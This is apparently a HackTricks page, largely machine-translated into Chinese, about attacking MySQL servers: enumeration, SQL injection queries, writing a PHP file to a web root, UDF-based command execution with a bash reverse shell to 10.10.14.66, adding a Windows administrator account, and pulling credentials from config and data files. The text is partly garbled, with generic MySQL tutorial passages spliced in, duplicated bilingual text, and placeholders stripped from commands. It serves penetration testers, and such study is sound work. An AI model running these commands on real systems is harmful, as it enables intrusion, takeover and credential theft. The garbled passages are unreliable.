# 3306 - Pentesting Mysql

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

* 你在一个**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！ * 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) * 获得[**官方PEASS和HackTricks的衣物**](https://peass.creator-spring.com) * **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**

[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一，也是欧洲最重要的网络安全活动之一。作为促进技术知识的使命，这个大会是技术和网络安全专业人士的热点交流平台。 {% embed url="https://www.rootedcon.com/" %} ## **基本信息** **MySQL**是一个免费的开源关系型数据库管理系统（RDBMS），使用结构化查询语言（**SQL**）。来自[这里](https://www.siteground.com/tutorials/php-mysql/mysql/)。 **默认端口：** 3306 ``` 3306/tcp open mysql ``` ## **连接** ### **本地** ```bash mysql -u root # Connect to root without password mysql -u root -p # A password will be asked (check someone) ``` ### 远程 MySQL allows remote connections by default, which means that it can be accessed from other machines on the network. This can be a security risk if proper precautions are not taken. MySQL默认允许远程连接，这意味着它可以从网络上的其他计算机访问。如果不采取适当的预防措施，这可能会带来安全风险。 To secure remote access to MySQL, you can follow these steps: 要保护MySQL的远程访问安全，可以按照以下步骤进行操作： 1. **Bind MySQL to a specific IP address**: By default, MySQL listens on all available IP addresses. You can change this by modifying the `bind-address` parameter in the MySQL configuration file (`my.cnf`). Set it to the IP address you want MySQL to listen on. 1. **将MySQL绑定到特定的IP地址**：默认情况下，MySQL监听所有可用的IP地址。您可以通过修改MySQL配置文件（`my.cnf`）中的`bind-address`参数来更改此设置。将其设置为您希望MySQL监听的IP地址。 2. **Create a firewall rule**: Configure your firewall to only allow incoming connections to the MySQL port (default is 3306) from trusted IP addresses or networks. This will prevent unauthorized access to the MySQL service. 2. **创建防火墙规则**：配置防火墙，仅允许来自受信任的IP地址或网络的MySQL端口（默认为3306）的入站连接。这将防止未经授权的访问MySQL服务。 3. **Use strong passwords**: Ensure that all MySQL user accounts have strong, unique passwords. Avoid using default or easily guessable passwords. 3. **使用强密码**：确保所有MySQL用户帐户都具有强大且唯一的密码。避免使用默认或容易猜测的密码。 4. **Limit privileges**: Grant only the necessary privileges to MySQL user accounts. Avoid granting unnecessary privileges that could be exploited by an attacker. 4. **限制权限**：仅向MySQL用户帐户授予必要的权限。避免授予攻击者可能利用的不必要的权限。 5. **Enable SSL/TLS encryption**: Configure MySQL to use SSL/TLS encryption for secure communication between the client and the server. This will protect the data transmitted over the network from eavesdropping and tampering. 5. **启用SSL/TLS加密**：配置MySQL使用SSL/TLS加密进行客户端和服务器之间的安全通信。这将保护通过网络传输的数据免受窃听和篡改。 By following these steps, you can enhance the security of your MySQL server and reduce the risk of unauthorized access or data breaches. ```bash mysql -h -u root mysql -h -u root@localhost ``` ## 外部枚举其中一些枚举操作需要有效的凭据 ```bash nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 msf> use auxiliary/scanner/mysql/mysql_version msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds msf> use auxiliary/admin/mysql/mysql_enum #Creds msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds ``` ### [**暴力破解**](../generic-methodologies-and-resources/brute-force.md#mysql) ### 写入任何二进制数据 ```bash CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY) CONVERT(from_base64("aG9sYWFhCg=="), BINARY) ``` ## **MySQL命令** MySQL is a popular open-source relational database management system. It is widely used in web applications and is known for its speed and reliability. In this section, we will explore some commonly used MySQL commands for database management and manipulation. ### **Connecting to MySQL** To connect to a MySQL server, you can use the following command: ```bash mysql -h -u -p ``` Replace `` with the hostname or IP address of the MySQL server, `` with the username, and `` with the password. ### **Creating a Database** To create a new database, use the `CREATE DATABASE` command: ```sql CREATE DATABASE ; ``` Replace `` with the desired name for the database. ### **Selecting a Database** To select a database to work with, use the `USE` command: ```sql USE ; ``` Replace `` with the name of the database you want to select. ### **Creating a Table** To create a new table in a database, use the `CREATE TABLE` command: ```sql CREATE TABLE ( , , ... ); ``` Replace `` with the desired name for the table, `` with the name of the first column, `` with the data type of the first column, and so on. ### **Inserting Data** To insert data into a table, use the `INSERT INTO` command: ```sql INSERT INTO (, , ...) VALUES (, , ...); ``` Replace `` with the name of the table, `` and `` with the names of the columns you want to insert data into, and ``, ``, etc. with the corresponding values. ### **Querying Data** To retrieve data from a table, use the `SELECT` command: ```sql SELECT , , ... FROM WHERE ; ``` Replace ``, ``, etc. with the names of the columns you want to retrieve, `` with the name of the table, and `` with the condition that the data must meet. ### **Updating Data** To update data in a table, use the `UPDATE` command: ```sql UPDATE SET = , = , ... WHERE ; ``` Replace `` with the name of the table, ``, ``, etc. with the names of the columns you want to update, ``, ``, etc. with the new values, and `` with the condition that the data must meet. ### **Deleting Data** To delete data from a table, use the `DELETE FROM` command: ```sql DELETE FROM WHERE ; ``` Replace `` with the name of the table and `` with the condition that the data must meet. ### **Dropping a Database** To drop a database, use the `DROP DATABASE` command: ```sql DROP DATABASE ; ``` Replace `` with the name of the database you want to drop. ### **Dropping a Table** To drop a table, use the `DROP TABLE` command: ```sql DROP TABLE ; ``` Replace `` with the name of the table you want to drop. These are just a few of the many commands available in MySQL. By mastering these commands, you will have a solid foundation for managing and manipulating databases using MySQL. ```bash show databases; use ; connect ; show tables; describe ; show columns from ; select version(); #version select @@version(); #version select user(); #User select database(); #database name #Get a shell with the mysql client user \! sh #Basic MySQLi Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables Union Select 1,2,3,4,column_name from information_schema.columns where table_name="

" #Read & Write ## Yo need FILE privilege to read & write to files. select load_file('/var/lib/mysql-files/key.txt'); #Read file select 1,2,"",4 into OUTFILE 'C:/xampp/htdocs/back.php' #Try to change MySQL root password UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root'; UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root'; FLUSH PRIVILEGES; quit; ``` ```bash mysql -u username -p < manycommands.sql #A file with all the commands you want to execute mysql -u root -h 127.0.0.1 -e 'show databases;' ``` ### MySQL权限枚举 MySQL数据库是一种常用的关系型数据库管理系统，用于存储和管理数据。在进行MySQL渗透测试时，了解目标数据库的权限设置非常重要。通过枚举MySQL权限，我们可以确定当前用户的权限级别，并尝试利用可能存在的权限漏洞。以下是一些常用的MySQL权限枚举技术： #### 1. SHOW GRANTS 使用`SHOW GRANTS`语句可以查看当前用户的权限。这将显示当前用户被授予的所有权限。 ```sql SHOW GRANTS; ``` #### 2. INFORMATION_SCHEMA MySQL的`INFORMATION_SCHEMA`数据库存储了关于数据库、表、列和权限的元数据信息。我们可以查询`INFORMATION_SCHEMA`来获取有关权限的详细信息。 ```sql SELECT * FROM INFORMATION_SCHEMA.USER_PRIVILEGES; ``` #### 3. mysql.user表 `mysql.user`表包含了MySQL用户的详细信息，包括用户名、密码和权限。我们可以查询该表来获取有关用户权限的信息。 ```sql SELECT * FROM mysql.user; ``` #### 4. SHOW GRANTS FOR 使用`SHOW GRANTS FOR`语句可以查看指定用户的权限。将``替换为要查询的用户名。 ```sql SHOW GRANTS FOR ; ``` #### 5. mysql.db表 `mysql.db`表存储了数据库级别的权限信息。我们可以查询该表来获取有关数据库权限的信息。 ```sql SELECT * FROM mysql.db; ``` #### 6. mysql.tables_priv表 `mysql.tables_priv`表存储了表级别的权限信息。我们可以查询该表来获取有关表权限的信息。 ```sql SELECT * FROM mysql.tables_priv; ``` #### 7. mysql.columns_priv表 `mysql.columns_priv`表存储了列级别的权限信息。我们可以查询该表来获取有关列权限的信息。 ```sql SELECT * FROM mysql.columns_priv; ``` 通过使用这些MySQL权限枚举技术，我们可以更好地了解目标数据库的权限设置，并发现可能存在的安全漏洞。 ```sql #Mysql SHOW GRANTS [FOR user]; SHOW GRANTS; SHOW GRANTS FOR 'root'@'localhost'; SHOW GRANTS FOR CURRENT_USER(); # Get users, permissions & hashes SELECT * FROM mysql.user; #From DB select * from mysql.user where user='root'; ## Get users with file_priv select user,file_priv from mysql.user where file_priv='Y'; ## Get users with Super_priv select user,Super_priv from mysql.user where Super_priv='Y'; # List functions SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION'; #@ Functions not from sys. db SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys'; ``` 您可以在文档中查看每个权限的含义：[https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute) ### MySQL文件远程命令执行 {% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %} [mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md) {% endcontent-ref %} ## MySQL客户端任意读取文件实际上，当您尝试将**文件内容**通过**将数据加载到表中**的方式发送给MySQL或MariaDB服务器时，服务器会要求**客户端读取文件并发送内容**。**因此，如果您能够篡改MySQL客户端以连接到您自己的MySQL服务器，您就可以读取任意文件。**\ 请注意，这是使用以下方式的行为： ```bash load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; ``` （注意到“local”这个词）\ 因为没有“local”，你可能会得到： ```bash mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement ``` **初始 PoC：**[**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\ **在这篇论文中，您可以看到对攻击的完整描述，甚至如何扩展到 RCE：**[**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\ **在这里，您可以找到攻击的概述：**[**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)

[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一，也是欧洲最重要的活动之一。作为促进技术知识的使命，这个大会是技术和网络安全专业人士的热点聚会。 {% embed url="https://www.rootedcon.com/" %} ## POST ### Mysql 用户如果 mysql 以 **root** 身份运行，那将非常有趣： ```bash cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user" systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1 ``` #### mysqld.cnf的危险设置来自[https://academy.hackthebox.com/module/112/section/1238](https://academy.hackthebox.com/module/112/section/1238) | **设置** | **描述** | | ------------------ | ----------------------------------------------------------------------------------------------------------------------------------------- | | `user` | 设置MySQL服务将以哪个用户身份运行。 | | `password` | 设置MySQL用户的密码。 | | `admin_address` | 用于监听管理网络接口上的TCP/IP连接的IP地址。 | | `debug` | 此变量指示当前的调试设置（日志中的敏感信息）。 | | `sql_warnings` | 此变量控制单行INSERT语句在出现警告时是否生成信息字符串（日志中的敏感信息）。 | | `secure_file_priv` | 此变量用于限制数据导入和导出操作的影响范围。 | ### 特权升级 ```bash # Get current user (an all users) privileges and hashes use mysql; select user(); select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user; # Get users, permissions & creds SELECT * FROM mysql.user; mysql -u root --password= -e "SELECT * FROM mysql.user;" # Create user and give privileges create user test identified by 'test'; grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION; # Get a shell (with your permissions, usefull for sudo/suid privesc) \! sh ``` ### 通过库进行权限提升如果 **mysql 服务器以 root 用户**（或其他更高权限用户）运行，你可以让它执行命令。为此，你需要使用 **用户自定义函数**。而要创建用户自定义函数，你需要一个运行 mysql 的操作系统的 **库**。可以在 sqlmap 和 metasploit 中找到要使用的恶意库，方法是执行 **`locate "*lib_mysqludf_sys*"`** 命令。**`.so`** 文件是 **Linux** 库，**`.dll`** 是 **Windows** 库，选择你需要的那个。如果你 **没有** 这些库，你可以 **寻找它们**，或者下载这个 [**Linux C 代码**](https://www.exploit-db.com/exploits/1518) 并在 Linux 受漏洞影响的机器上 **编译** 它： ```bash gcc -g -c raptor_udf2.c gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc ``` 现在你已经有了库，作为特权用户（root？）登录到Mysql中，然后按照以下步骤进行操作： #### Linux ```sql # Use a database use mysql; # Create a table to load the library and move it to the plugins dir create table npn(line blob); # Load the binary library inside the table ## You might need to change the path and file name insert into npn values(load_file('/tmp/lib_mysqludf_sys.so')); # Get the plugin_dir path show variables like '%plugin%'; # Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ # dump in there the library select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so'; # Create a function to execute commands create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; # Execute commands select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt'); select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"'); ``` #### Windows #### Windows MySQL can be installed on Windows using the official installer available on the MySQL website. Once installed, the MySQL service will be running in the background. To connect to the MySQL server on Windows, you can use the MySQL Command Line Client or a graphical user interface (GUI) tool like MySQL Workbench. To access the MySQL Command Line Client, open the Command Prompt and type `mysql -u -p`. Replace `` with the username you want to use to connect to the MySQL server. You will be prompted to enter the password for the specified username. To use a GUI tool like MySQL Workbench, you will need to download and install it from the MySQL website. Once installed, open MySQL Workbench and click on the "+" icon in the "MySQL Connections" section to create a new connection. Enter the necessary details like the connection name, hostname, port, username, and password, and click "Test Connection" to verify the connection. Once connected to the MySQL server, you can perform various tasks like creating databases, tables, and executing SQL queries. #### Windows MySQL可以使用MySQL官方网站上提供的官方安装程序在Windows上安装。安装完成后，MySQL服务将在后台运行。要连接到Windows上的MySQL服务器，可以使用MySQL命令行客户端或图形用户界面（GUI）工具，如MySQL Workbench。要访问MySQL命令行客户端，请打开命令提示符并键入`mysql -u -p`。将``替换为要用于连接到MySQL服务器的用户名。然后，您将被提示输入指定用户名的密码。要使用MySQL Workbench等GUI工具，您需要从MySQL网站下载并安装它。安装完成后，打开MySQL Workbench，单击“MySQL Connections”部分的“+”图标以创建新连接。输入必要的详细信息，如连接名称、主机名、端口、用户名和密码，然后单击“Test Connection”以验证连接。连接到MySQL服务器后，您可以执行各种任务，如创建数据库、表和执行SQL查询。 ```sql # CHech the linux comments for more indications USE mysql; CREATE TABLE npn(line blob); INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll')); show variables like '%plugin%'; SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll'; CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll'; SELECT sys_exec("net user npn npn12345678 /add"); SELECT sys_exec("net localgroup Administrators npn /add"); ``` ### 从文件中提取MySQL凭据在 _/etc/mysql/debian.cnf_ 文件中，您可以找到用户 **debian-sys-maint** 的**明文密码**。 ```bash cat /etc/mysql/debian.cnf ``` 您可以使用这些凭据登录到MySQL数据库。在文件_/var/lib/mysql/mysql/user.MYD_中，您可以找到MySQL用户的所有哈希值（可以从数据库中的mysql.user中提取的哈希值）。您可以通过以下方式提取它们： ```bash grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password" ``` ### 启用日志记录您可以在`/etc/mysql/my.cnf`文件中取消注释以下行以启用mysql查询的日志记录： ![](<../.gitbook/assets/image (277).png>) ### 有用的文件配置文件 * windows \* * config.ini * my.ini * windows\my.ini * winnt\my.ini * \/mysql/data/ * unix * my.cnf * /etc/my.cnf * /etc/mysql/my.cnf * /var/lib/mysql/my.cnf * \~/.my.cnf * /etc/my.cnf * 命令历史记录 * \~/.mysql.history * 日志文件 * connections.log * update.log * common.log ## 默认的MySQL数据库/表 {% tabs %} {% tab title="information_schema" %} ALL\_PLUGINS\ APPLICABLE\_ROLES\ CHARACTER\_SETS\ CHECK\_CONSTRAINTS\ COLLATIONS\ COLLATION\_CHARACTER\_SET\_APPLICABILITY\ COLUMNS\ COLUMN\_PRIVILEGES\ ENABLED\_ROLES\ ENGINES\ EVENTS\ FILES\ GLOBAL\_STATUS\ GLOBAL\_VARIABLES\ KEY\_COLUMN\_USAGE\ KEY\_CACHES\ OPTIMIZER\_TRACE\ PARAMETERS\ PARTITIONS\ PLUGINS\ PROCESSLIST\ PROFILING\ REFERENTIAL\_CONSTRAINTS\ ROUTINES\ SCHEMATA\ SCHEMA\_PRIVILEGES\ SESSION\_STATUS\ SESSION\_VARIABLES\ STATISTICS\ SYSTEM\_VARIABLES\ TABLES\ TABLESPACES\ TABLE\_CONSTRAINTS\ TABLE\_PRIVILEGES\ TRIGGERS\ USER\_PRIVILEGES\ VIEWS\ INNODB\_LOCKS\ INNODB\_TRX\ INNODB\_SYS\_DATAFILES\ INNODB\_FT\_CONFIG\ INNODB\_SYS\_VIRTUAL\ INNODB\_CMP\ INNODB\_FT\_BEING\_DELETED\ INNODB\_CMP\_RESET\ INNODB\_CMP\_PER\_INDEX\ INNODB\_CMPMEM\_RESET\ INNODB\_FT\_DELETED\ INNODB\_BUFFER\_PAGE\_LRU\ INNODB\_LOCK\_WAITS\ INNODB\_TEMP\_TABLE\_INFO\ INNODB\_SYS\_INDEXES\ INNODB\_SYS\_TABLES\ INNODB\_SYS\_FIELDS\ INNODB\_CMP\_PER\_INDEX\_RESET\ INNODB\_BUFFER\_PAGE\ INNODB\_FT\_DEFAULT\_STOPWORD\ INNODB\_FT\_INDEX\_TABLE\ INNODB\_FT\_INDEX\_CACHE\ INNODB\_SYS\_TABLESPACES\ INNODB\_METRICS\ INNODB\_SYS\_FOREIGN\_COLS\ INNODB\_CMPMEM\ INNODB\_BUFFER\_POOL\_STATS\ INNODB\_SYS\_COLUMNS\ INNODB\_SYS\_FOREIGN\ INNODB\_SYS\_TABLESTATS\ GEOMETRY\_COLUMNS\ SPATIAL\_REF\_SYS\ CLIENT\_STATISTICS\ INDEX\_STATISTICS\ USER\_STATISTICS\ INNODB\_MUTEXES\ TABLE\_STATISTICS\ INNODB\_TABLESPACES\_ENCRYPTION\ user\_variables\ INNODB\_TABLESPACES\_SCRUBBING\ INNODB\_SYS\_SEMAPHORE\_WAITS {% endtab %} {% tab title="mysql" %} columns\_priv\ column\_stats\ db\ engine\_cost\ event\ func\ general\_log\ gtid\_executed\ gtid\_slave\_pos\ help\_category\ help\_keyword\ help\_relation\ help\_topic\ host\ index\_stats\ innodb\_index\_stats\ innodb\_table\_stats\ ndb\_binlog\_index\ plugin\ proc\ procs\_priv\ proxies\_priv\ roles\_mapping\ server\_cost\ servers\ slave\_master\_info\ slave\_relay\_log\_info\ slave\_worker\_info\ slow\_log\ tables\_priv\ table\_stats\ time\_zone\ time\_zone\_leap\_second\ time\_zone\_name\ time\_zone\_transition\ time\_zone\_transition\_type\ transaction\_registry\ user {% endtab %} {% tab title="performance_schema" %} accounts\ cond\_instances\ events\_stages\_current\ events\_stages\_history\ events\_stages\_history\_long\ events\_stages\_summary\_by\_account\_by\_event\_name\ events\_stages\_summary\_by\_host\_by\_event\_name\ events\_stages\_summary\_by\_thread\_by\_event\_name\ events\_stages\_summary\_by\_user\_by\_event\_name\ events\_stages\_summary\_global\_by\_event\_name\ events\_statements\_current\ events\_statements\_history\ events\_statements\_history\_long\ events\_statements\_summary\_by\_account\_by\_event\_name\ events\_statements\_summary\_by\_digest\ events\_statements\_summary\_by\_host\_by\_event\_name\ events\_statements\_summary\_by\_program\ events\_statements\_summary\_by\_thread\_by\_event\_name\ events\_statements\_summary\_by\_user\_by\_event\_name\ events\_statements\_summary\_global\_by\_event\_name\ events\_transactions\_current\ events\_transactions\_history\ events\_transactions\_history\_long\ events\_transactions\_summary\_by\_account\_by\_event\_name\ events\_transactions\_summary\_by\_host\_by\_event\_name\ events\_transactions\_summary\_by\_thread\_by\_event\_name\ events\_transactions\_summary\_by\_user\_by\_event\_name\ events\_transactions\_summary\_global\_by\_event\_name\ events\_waits\_current\ events\_waits\_history\ events\_waits\_history\_long\ events\_waits\_summary\_by\_account\_by\_event\_name\ events\_waits\_summary\_by\_host\_by\_event\_name\ events\_waits\_summary\_by\_instance\ events\_waits\_summary\_by\_thread\_by\_event\_name\ events\_waits\_summary\_by\_user\_by\_event\_name\ events\_waits\_summary\_global\_by\_event\_name\ file\_instances\ file\_summary\_by\_event\_name\ file\_summary\_by\_instance\ global\_status\ global\_variables\ host\_cache\ hosts\ memory\_summary\_by\_account\_by\_event\_name\ memory\_summary\_by\_host\_by\_event\_name\ memory\_summary\_by\_thread\_by\_event\_name\ memory\_summary\_by\_user\_by\_event\_name\ memory\_summary\_global\_by\_event\_name\ metadata\_locks\ mutex\_instances\ objects\_summary\_global\_by\_type\ performance\_timers\ prepared\_statements\_instances\ replication\_applier\_configuration\ replication\_applier\_status\ replication\_applier\_status\_by\_coordinator\ replication\_applier\_status\_by\_worker\ replication\_connection\_configuration\ replication\_connection\_status\ replication\_group\_member\_stats\ replication\_group\_members\ rwlock\_instances\ session\_account\_connect\_attrs\ session\_connect\_attrs\ session\_status\ session\_variables\ setup\_actors\ setup\_consumers\ setup\_instruments\ setup\_objects\ setup\_timers\ socket\_instances\ socket\_summary\_by\_event\_name\ socket\_summary\_by\_instance\ status\_by\_account\ status\_by\_host\ status\_by\_thread\ status\_by\_user\ table\_handles\ table\_io\_waits\_summary\_by\_index\_usage\ table\_io\_waits\_summary\_by\_table\ table\_lock\_waits\_summary\_by\_table\ threads\ user\_variables\_by\_thread\ users\ variables\_by\_thread {% endtab %} {% tab title="sys" %} host\_summary\ host_summary_by_file_io\ host_summary_by_file_io_type\ host_summary_by_stages\ host_summary_by_statement_latency\ host_summary_by_statement_type\ innodb_buffer_stats_by_schema\ innodb_buffer_stats_by_table\ innodb_lock_waits\ io_by_thread_by_latency\ io_global_by_file_by_bytes\ io_global_by_file_by_latency\ io_global_by_wait_by_bytes\ io_global_by_wait_by_latency\ latest_file_io\ memory_by_host_by_current_bytes\ memory_by_thread_by_current_bytes\ memory_by_user_by_current_bytes\ memory_global_by_current_bytes\ memory_global_total\ metrics\ processlist\ ps_check_lost_instrumentation\ schema_auto_increment_columns\ schema_index_statistics\ schema_object_overview\ schema_redundant_indexes\ schema_table_lock_waits\ schema_table_statistics\ schema_table_statistics_with_buffer\ schema_tables_with_full_table_scans\ schema_unused_indexes\ session\ session_ssl_status\ statement_analysis\ statements_with_errors_or_warnings\ statements_with_full_table_scans\ statements_with_runtimes_in_95th_percentile\ statements_with_sorting\ statements_with_temp_tables\ sys_config\ user_summary\ user_summary_by_file_io\ user_summary_by_file_io_type\ user_summary_by_stages\ user_summary_by_statement_latency\ user_summary_by_statement_type\ version\ wait_classes_global_by_avg_latency\ wait_classes_global_by_latency\ waits_by_host_by_latency\ waits_by_user_by_latency\ waits_global_by_latency\ x$host_summary\ x$host_summary_by_file_io\ x$host_summary_by_file_io_type\ x$host_summary_by_stages\ x$host_summary_by_statement_latency\ x$host_summary_by_statement_type\ x$innodb_buffer_stats_by_schema\ x$innodb_buffer_stats_by_table\ x$innodb_lock_waits\ x$io_by_thread_by_latency\ x$io_global_by_file_by_bytes\ x$io_global_by_file_by_latency\ x$io_global_by_wait_by_bytes\ x$io_global_by_wait_by_latency\ x$latest_file_io\ x$memory_by_host_by_current_bytes\ x$memory_by_thread_by_current_bytes\ x$memory_by_user_by_current_bytes\ x$memory_global_by_current_bytes\ x$memory_global_total\ x$processlist\ x$ps_digest_95th_percentile_by_avg_us\ x$ps_digest_avg_latency_distribution\ x$ps_schema_table_statistics_io\ x$schema_flattened_keys\ x$schema_index_statistics\ x$schema_table_lock_waits\ x$schema_table_statistics\ x$schema_table_statistics_with_buffer\ x$schema_tables_with_full_table_scans\ x$session\ x$statement_analysis\ x$statements_with_errors_or_warnings\ x$statements_with_full_table_scans\ x$statements_with_runtimes_in_95th_percentile\ x$statements_with_sorting\ x$statements_with_temp_tables\ x$user_summary\ x$user_summary_by_file_io\ x$user_summary_by_file_io_type\ x$user_summary_by_stages\ x$user_summary_by_statement_latency\ x$user_summary_by_statement_type\ x$wait_classes_global_by_avg_latency\ x$wait_classes_global_by_latency\ x$waits_by_host_by_latency\ x$waits_by_user_by_latency\ x$waits_global_by_latency ## HackTricks自动命令 ``` Protocol_Name: MySql #Protocol Abbreviation if there is one. Port_Number: 3306 #Comma separated if there is more than one. Protocol_Description: MySql #Protocol Abbreviation Spelled out Entry_1: Name: Notes Description: Notes for MySql Note: | MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL). https://book.hacktricks.xyz/pentesting/pentesting-mysql Entry_2: Name: Nmap Description: Nmap with MySql Scripts Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306 Entry_3: Name: MySql Description: Attempt to connect to mysql server Command: mysql -h {IP} -u {Username}@localhost Entry_4: Name: MySql consolesless mfs enumeration Description: MySql enumeration without the need to run msfconsole Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit' ```

[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一，也是欧洲最重要的活动之一。作为促进技术知识的使命，这个大会是技术和网络安全专业人士的热点交流平台。 {% embed url="https://www.rootedcon.com/" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

* 你在一家网络安全公司工作吗？想要在HackTricks中宣传你的公司吗？或者想要获取PEASS的最新版本或下载HackTricks的PDF吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！ * 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) * 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) * **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**